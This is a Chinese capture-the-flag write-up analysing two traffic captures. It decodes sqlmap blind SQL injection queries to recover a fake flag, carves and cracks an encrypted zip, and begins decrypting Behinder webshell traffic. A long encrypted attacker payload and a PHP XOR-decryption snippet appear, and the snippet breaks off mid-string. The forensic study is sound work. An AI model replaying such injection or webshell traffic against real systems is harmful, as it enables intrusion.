前言

前段时间,在一个群里面有两个人同时把两道流量分析题发出来,我做了一下感觉这两道题的质量很不错,所以就分享一下wp给大家,希望对大家有帮助。

题目附件我分享一下

链接:https://pan.baidu.com/s/1n_Q4pRgt0_GF-8n5Nop9fA 密码:5p76

Traffic.pcapng——一个10M的大小流量包

直接过滤http协议,可以看出这个流量包捕捉的是数据库注入流量


直接去分析一波,发现是用盲注的方式注入,由于本人盲注的技术太菜了,是菜鸡,所以请了一位大佬9u4ck给我一番的教程指导我才明白,大佬yyds

直接把http协议里面的所有包都全复制到txt文件里面

然后我们过滤掉一下无用的,提取关键的语句即可(写的垃圾脚本)


但是这个url编码还是存在,于是url解码(http://www.jsons.cn/urlencode/)


然后将解码后的字符复制过来


从测试的语句中就可以看出,使用的是sqlmap测试的,于是我们直接看关键的,直接跳过数据库表名等,直接看看flag

如图,我们简单的判断

再继续细化,以免看的太乱

再简单的分析,简单的说,各函数的意思不细讲

第一个语句:判断lag表的第一个字符是否大于64,显然是大于64,因为第二条语句就判断是否大于96,如果是小于64的话就不会去判断是否大于96了,接着第三条语句判断了是否大于112,显然我们可以从第二第三条语句知道,flag的第一个字符的 ascii码是大于96的,从第四条语句中又可以判断出第一个字符是小于112的,因为大于112不成立所以才需要往更小的值判断,同理通过第五条语句可判断出第一个字符是小于104的,因为第五条语句是跟100比较,只有比104小才需要去跟100比较,同理第六条语句可同理判断出flag的的第一个字符是大于100的,接着第七条语句判断 是否大于101,显然是大于101的,因为小于了102不成立后才去验证是否大于101, 验证完了,即下一步,那就说明flag的第一个字符一定大于101,但是大于102不成立,因为倒数一句不成立才进行最后一句,简单的说就是慢慢的缩小范围,就类似于二分法,所以就可以从这两个语句判断出,flag的第一个字符就是 102 ,对应的字符就是 f

接着运用同样的分析方式去分析第二个字符

同样为了方便看清楚,只提取了重要的内容

利用以上的分析方法,再简单的叙述,第二个字符大于96,因为如果不大于就不会 再去是否大于112,而是应该去判断是否大于64之类的,同理可判断这个字符(第二 个字符)是小于112的,接着这个字符应该是大于104的,继续判断,这个字符大于 108是不满足的,大于106的满足,最后大于107是满足呢还不是不满足,这都可以 说的通,于是就产生分歧了,因为这个字符是107满足我们分析,但是这个字符是 108也会满足我们的分析,这里最后选择108,因为108对应的是字母 l ,结合第一个 字母 f,连接起来就是 fl ,也就是flag的前两个字母

紧接着继续分析第三个字符


直接看出来,大于96,小于112,小于104,小于100,小于98,最后可以确定等于 97,因为大于96,小于98,利用以上的猜测,结果就是 97 ,即字母 a ,也就是前 三个字符是 fla ,不用看,直接猜测下一个字符就是g


同理,第四个字符,大于96,小于112,小于104,大于100,大于102,所以就是 103,即 g

第五个字符,不再过多的叙述,就是 123 ,即 { ,所以得出flag前五个字符就是 flag{

第六个字符为:101或者102,这里选102,即 f , flag{f


第七个字符:97 即 a , flag{fa


第八个字符:107即 kflag{fak ,flag有k这个字符吗,显然应该是不对的,flag 内容一般是[0-9a-f ]和-

第九个字符:101即 eflag{fake

第十个字符:101或者102,这里选择102即 fflag{fakef


第十一个字符:108即 lflag{fakefl

以下不再截图,因为都一样,直接上最后的flag

flag{fakeflag2333333333333}

你可能会问为什么没有第28个字符,从最后的判断就知道不存在第28个字符

其实有一些是最后得出flag才去做出更好的选择的,比如fakeflag,因为一开始我得到的是flag{fakeekag2333333333333},最后回头慢慢更改,个人能力问题吧,判断存在误差也是可以理解的

可惜得出的flag是一个假flag,接着继续往下解
在第18918个包用追踪http流查看到里面有一个flag.txt和一个pk,大概是一个压缩包里面有一个txt文本吧,但是后面又有一句话,不知道是什么意思

hint:I love six GOD.


然后保存文件选择显示分组字节流和点击save as,必须用这个操作才能不会出现文件十六进制那些可见字符被更改为2E

并且把红色框圈住的都直接删了并补上zip的头

就是这样,然后改后缀名为zip解压发现有密码,经过测试不是伪加密,是真的加密了,拿出我最喜欢的爆破ZIP工具PRTK


直接秒破,密码为123456


好家伙,这又是一个假flag,一道题目两个假flag,这人有点。。。。。。,但是它提示了Do U know bingxie???难道就是传说中的冰蝎流量解密?

然后在第19219个包并追踪HTTP流里面发现了有一大串base64编码


base64编码如下:

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

但这里有一个注意,这些是冰蝎加密的流量,不能直接用普通的base64解码来解,要先用解密流量脚本去跑一下再解码base64

然后这里发现有两个GET请求,我们来分析一下


然后看一下流量包,首先产生了两次密钥 ,通过查询这两个密钥得知是当客户端以GET发起请求并设置了参数pass时,服务端会产生一个16位的随机密钥并写入Session。解密方式是,如果服务端不存在openssl,就用先base64解码,然后使用key进行循环异或加密。

然后开始POST进行攻击 - -

然后就是需要解密一下攻击者POST的内容了。我先试了试使用key进行异或解密:

<?php{   $key = '84319025cf3bd993';$post = 'VUBCXEJGSQYQUg5MW1hAXQIHbl1VUVoHAxtFIGhJX1taeUdaXAtMOT5xFAdXa0NaWVBedHNZAic3Qw0+bn9YYmx6XnMAfEMBCGEOBldoR258X0ZjZF1SByFlVgB6AFxccwJCdklwXwIhdRsHC28DaGJlZGtZAgEpH1hVIGhWfXtZaQBbXXwFAjEKFy1+XV9ccn1ZY11kYQcueg0ucXcDW11fBn1hXVIqJXIFLnF0S3FwA1ZYZ3xDAQhqDS4KbwNiXQMFc0lFWzlUeRAoQAB5agQGYWxbZ1svJWEYAHFwQ3dDA3pwc3NSKiVhGCl6eApxc19bWwIHByglVww9VEpddHdXAF13a0EsJQsUN2xdfGwFeXdzSUVeABx2EitOCXhxd3JWcHdeWCglYRgpengKaGdyWloDYEwoPkAsJ1B4VHF3clZwc3NSAAtlUgBhc0Zxd2FLdHRBeyAPcgUtensKYmNLS2NoQXsgD3IFLXp4VHF3clZaXWQFBz55Fy1+VVlaBgYDcnNWWzoLQAwoel0CXHNqRXZzCkMwM1ctMAhzdXJNRFpaA2BMKDJALCdQeFRxd3EIfWFCDCc3Qw8AbgxZXHNfR1tZcFs5PmEMPVRNZ1x8el5zeHwFAA9fVSBoVlRxd3JWc3h/QioiAwUFbndFWlpqXnMCVlwCH1ARLgpvA2JdAwV1SQt/MVYGMjFSbF10d2FLdGNZAic3XAUtenhUcnx+SXB0AlICMX0UBldgXHIHZQFjWQIBKR9EDD4Lc0F0TQp7awAHZTYNZgwoemtJXHx6QXZHAn4qJXIFLX5VXnN3YUt0Y3MMMzVyCQcKa0pzbEB/ellzUiolcgUtenhUW1llAV1oeEAqJWEYKW1KfXtdclZwc3AMOTFLGD5hSn17XXJWcHNzUiolcgUHVG8DXGx5RHB3Xl8BVAZQL3pdAlxzakV2c1FGKVRXCwVAAUVrYVd+bQF4cykfRAkHCmtKc2BAf3pZc1IqJXFbIGhJCnxlQ1xdZwdfByFfFAZQe1hiY0t0WGh7WikhYRIHUFJ9e1pAf3pZc1IqJXIJPlRVQGJsflZpY3BdAAh5CgFvAFhZY2lccnh8XzoxBgkFYXBccnNhQVpZWUYqIXUbB1R/BnN1A3pwc3NSKiVyBS16eF10XVBCfWFdUiolcgUtenhUcXdQRHVZUXsgD3IFLXp4Q3NgQH96WXNSKiVxDwYKc19hY31ecHNVXjkLXxE+YXRUYWx+VnN3aEUBIWYSLXFKfXtdclZwc3NSKiVyBS9+VUlgBmFBWllVXCkhYRIHUAFYYllfQmNje0UoNXJNLX5rX1pyYUhjZ2daKg9hCQVhcEVyc2lBW3dnXCg1clQtcW9GWnNfRFhJVVwpIWESB1ABWGJZX0JjY3tFLBEDKS16eFRxfAN/ellzUiolcRs+YWsCW1kHVlpdA14CPnoNLn5rQ1tdWAZ9YUIMJzdcLCdUYwJaWX0BWGcLQCohAgoFbg1ccnMCR2N3Z0YqJWEVPWFrXHFwA1ZwWQZcLyVyCT0LAEZcc2VEXXNzDColegsoenhYYQZbWVpefFkHJXJbLXpwWnNlA3pcRwJ+IDVhFT1ha1xoY1ddXX